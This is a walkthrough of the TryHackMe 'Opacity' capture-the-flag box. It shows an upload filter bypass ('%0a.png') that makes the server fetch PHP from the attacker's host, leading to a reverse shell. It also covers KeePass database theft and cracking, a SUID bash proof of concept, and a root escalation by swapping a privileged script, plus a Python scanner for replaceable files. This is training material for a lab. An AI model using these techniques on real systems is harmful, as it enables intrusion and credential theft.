Opacity (THM)

Penthos
5 min read · Apr 17, 2023


A quick writeup/walkthrough for the Opacity room on TryHackMe (THM).

We start off with a quick Nmap scan (enumeration phase).

Nmap shows us a few open ports: SSH, a web server, and SMB.

PORT    STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Let's take a look at port 80 first (my favorite port to start on!).

It seems to be a login page; trying default creds got me nowhere fast!

After playing with the login for a while without success, I went back to enumeration with FFUF.

ffuf -u http://10.10.121.172/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -fc 404,403 -ic -c 

The FFUF scan returned only one endpoint for me, "/cloud". Let's have a look at what's there.

The page is a file upload for Personal Cloud storage. Testing the upload, it only seems to accept image files.

Testing further, I discovered the form takes a URL rather than a file: the server fetches the file itself, so I could make it pull a file from my machine after hosting it with python3.

python3 -m http.server 8084

I gave the url parameter my IP and port to test whether I'd get a callback.

POST /cloud/ HTTP/1.1
Host: 10.10.191.23
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: http://10.10.191.23
Connection: close
Referer: http://10.10.191.23/cloud/
Cookie: PHPSESSID=f2p80fi5tgqmcas14pgcjdb5bs
Upgrade-Insecure-Requests: 1

url=http://10.9.13.85:8084/test.php

This failed on the extension check: the application only accepts .png, .jpg and .gif. I was stuck for a few minutes until I read through the payloads at https://book.hacktricks.xyz/pentesting-web/file-upload

After trying a few of them I found that appending %0a.png (a URL-encoded newline followed by .png) got past the image filter: the check only looks at how the submitted string ends, while the file that actually gets fetched is test.php. The request now looked like this.

POST /cloud/ HTTP/1.1
Host: 10.10.191.23
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: http://10.10.191.23
Connection: close
Referer: http://10.10.191.23/cloud/
Cookie: PHPSESSID=f2p80fi5tgqmcas14pgcjdb5bs
Upgrade-Insecure-Requests: 1

url=http://10.9.13.85:8084/test.php%0a.png
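To make the filter bypass concrete, here is an added example (not code from the Opacity box or this writeup) that models a suffix-only extension check of the kind the %0a.png trick defeats, next to a check that validates the URL structurally and then verifies the downloaded bytes. The function names and the exact server-side logic are assumptions; the box's real PHP is not shown here.

```python
"""Weak vs. hardened extension check for a 'fetch image by URL' upload form.

Added example, not the box's code: weak_check() is a hypothetical model of a
suffix-only filter, hardened_check() and content_is_image() are how I would
validate the same input.
"""
import re
from urllib.parse import urlsplit, unquote

ALLOWED_EXT = (".png", ".jpg", ".gif")

# Real file signatures for the allowed image types.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def weak_check(url: str) -> bool:
    """Hypothetical vulnerable check: decode, then only look at the suffix.

    '%0a' decodes to a newline, so 'test.php\\n.png' ends in '.png' and passes,
    while whatever downloads the URL stops at the newline and fetches test.php.
    """
    return unquote(url).lower().endswith(ALLOWED_EXT)


def hardened_check(url: str) -> bool:
    """Validate the URL structurally before fetching anything."""
    decoded = unquote(url)
    # Control characters (newline, CR, NUL, ...) have no place in a URL and are
    # exactly what lets a second "extension" ride along; refuse them outright.
    if re.search(r"[\x00-\x1f\x7f]", decoded):
        return False
    parts = urlsplit(decoded)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    # Only the path decides the extension. urlsplit() separates query and
    # fragment, so 'shell.php#.png' or 'shell.php?x=.png' cannot smuggle one in.
    return parts.path.lower().endswith(ALLOWED_EXT)


def content_is_image(ext: str, data: bytes) -> bool:
    """After download, confirm the bytes start like the claimed image type.

    The broken-image icon in the writeup is what a PHP payload looks like when
    this check is missing.
    """
    sig = MAGIC.get(ext.lower())
    return sig is not None and data.startswith(sig)
```

The order matters: validate the URL before issuing the request (so the server is not turned into a fetcher for arbitrary targets), then validate the content before storing it under a name the web server will execute.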

I could now get a PHP file onto the server (reverse shell incoming!).

Below we can see the upload was accepted and listed as an image. Notice the broken-image icon: we supplied PHP, not image data.

Now I could swap test.php for a real PHP reverse shell. I used the standard PentestMonkey PHP reverse shell (available on revshells.com), set to my IP and listener port, replaced test.php with it, and sent the same request again.

Once it was uploaded, I requested the "image" from the server's image directory; because it is really PHP, the server executed it and the reverse shell connected back to my listener.

Now we have access to the box.

# Escalation time!

Now that we are on the box, it's time for enumeration phase 2.

Looking around the system I found a file called dataset.kdbx. A bit of research showed this is a KeePass password-manager database. It is protected by a master password, which we should be able to crack offline. Let's try!

Copy the file to your machine.

# Serve the file on the hacked box so we can get the file. 
python3 -m http.server 9092

# Then get the file to your attacker box
wget 10.10.191.23:9092/dataset.kdbx

With the file on our machine we use keepass2john (shipped with John the Ripper) to turn the database into a hash John can crack, then run it against rockyou:

keepass2john dataset.kdbx > dataset.hash
john dataset.hash --wordlist=/usr/share/wordlists/rockyou.txt

Then we get the master password! (nice)

With the master password you can load the database in KeePass and read the stored entries.

# Install keepass2
sudo apt install keepass2

Now you can run the KeePass program and give it the database file which you can now unlock with the password you cracked just now.

With this password we can now log in via SSH to the sysadmin account.

# Root

Root was relatively easy on this machine. In the user's home folder were a few scripts.

The file backup.inc.php stood out as the odd one out because its modification date differed from the rest. I tried to edit the file but did not have permission.

As we can see, there was no write permission on the file.

But if we check the directory above it, my user sysadmin has write permission on that folder. Deleting and renaming are directory operations, not file operations, so we can't edit the file in place but we can remove it and drop a replacement with the same name. Let's test that!

For testing I usually make a small PoC first, i.e. have the privileged job run:

# Normal PoC for a quick test (runs as root via the replaced script).
cp /bin/bash /tmp/b
chmod u+s /tmp/b

# Afterwards, run the SUID copy with -p so bash keeps the effective root uid.
/tmp/b -p
(root)#

This time I opted for another PHP reverse shell, the same PentestMonkey one as before.

rm scripts/lib/backup.inc.php
# Now create your shell (in sysadmin's home folder).
nano backup.inc.php
# Paste your reverse shell code into the file, then copy it into the lib folder.
cp backup.inc.php /home/sysadmin/scripts/lib/backup.inc.php

After this is done, start a listener and wait.

A backup script that uses this file runs as root every few minutes. Wait for it to fire and your root reverse shell will arrive!

Now you have full system access: grab the last flag, retire the box, and give yourself a pat on the back!
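The condition we just exploited (a file we cannot write, inside a directory we can) is worth hunting for systematically rather than by luck. The following is an added example, not part of this writeup or the box, that evaluates the Unix permission bits itself so it can be run as an unprivileged user over a home directory and also checked on constructed values; the Who class, the function names and the sample uid/gid values are my own.

```python
"""Find files that are read-only for us but sit in a directory we can write,
which means we can delete/rename them and drop in a replacement.

Added example (not the box's code). The permission logic is implemented from
mode bits and ownership instead of os.access() so it describes an
unprivileged user's view even when run as root, and so it can be unit-tested
on constructed stat values.
"""
import os
import stat
from dataclasses import dataclass
from typing import Iterator


@dataclass(frozen=True)
class Who:
    """Identity to evaluate permissions for (normally the current user)."""
    uid: int
    gid: int
    groups: frozenset  # supplementary group ids

    @classmethod
    def current(cls) -> "Who":
        return cls(os.getuid(), os.getgid(), frozenset(os.getgroups()))


def can_write(mode: int, st_uid: int, st_gid: int, who: Who) -> bool:
    """Classic owner/group/other write check; root is deliberately not special."""
    if who.uid == st_uid:
        return bool(mode & stat.S_IWUSR)
    if who.gid == st_gid or st_gid in who.groups:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def replaceable(file_mode: int, file_uid: int, file_gid: int,
                dir_mode: int, dir_uid: int, dir_gid: int, who: Who) -> bool:
    """True when the file is not writable for `who` but its directory is.

    A sticky directory (like /tmp) only lets the file's or directory's owner
    unlink entries, so that case is excluded.
    """
    if can_write(file_mode, file_uid, file_gid, who):
        return False  # plain editing works; nothing interesting here
    if not can_write(dir_mode, dir_uid, dir_gid, who):
        return False
    if dir_mode & stat.S_ISVTX and who.uid not in (file_uid, dir_uid):
        return False
    return True


def find_replaceable(root: str, who: Who) -> Iterator[str]:
    """Walk `root` and yield regular files matching replaceable()."""
    for dirpath, _dirs, files in os.walk(root):
        try:
            d = os.lstat(dirpath)
        except OSError:
            continue
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                f = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(f.st_mode):
                continue
            if replaceable(f.st_mode, f.st_uid, f.st_gid,
                           d.st_mode, d.st_uid, d.st_gid, who):
                yield path


def replace_file(path: str, data: bytes) -> None:
    """Swap the file out using only directory write permission: write a
    sibling temp file and rename it over the target (same effect as the
    rm + cp in the writeup, but atomic)."""
    tmp = path + ".new"
    with open(tmp, "wb") as fh:
        fh.write(data)
    os.replace(tmp, path)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~")
    for hit in find_replaceable(target, Who.current()):
        print(hit)
```

Run it as the low-privilege user against a tree such as /home/sysadmin; any hit that is executed by a privileged scheduled job, as backup.inc.php is here, is a candidate for exactly the swap above.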

Hope you enjoyed the box!
